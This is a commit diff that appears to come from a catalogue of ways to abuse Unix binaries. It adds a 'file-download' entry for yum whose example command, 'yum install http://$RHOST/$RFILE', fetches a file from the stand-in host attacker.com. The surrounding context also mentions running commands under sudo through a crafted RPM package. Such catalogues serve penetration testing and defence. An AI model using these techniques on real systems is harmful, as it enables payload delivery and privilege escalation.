Add file-download to yum

master
Roman Mueller 2020-10-02 20:22:06 +02:00 committed by GitHub
parent 1a5b396744
commit b8dc2aa817
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 6 additions and 0 deletions

View File

@ -1,5 +1,11 @@
---
functions:
file-download:
- description: Fetch a remote file via HTTP GET request. The file on the remote host must have an extension of `.rpm`, the content does not have to be an RPM file. The file will be downloaded to a randomly created directory in `/var/tmp`, for example `/var/tmp/yum-root-cR0O4h/`.
code: |
RHOST=attacker.com
RFILE=file_to_get.rpm
yum install http://$RHOST/$RFILE
sudo:
- description: |
It runs commands using a specially crafted RPM package. Generate it with [fpm](https://github.com/jordansissel/fpm) and upload it to the target.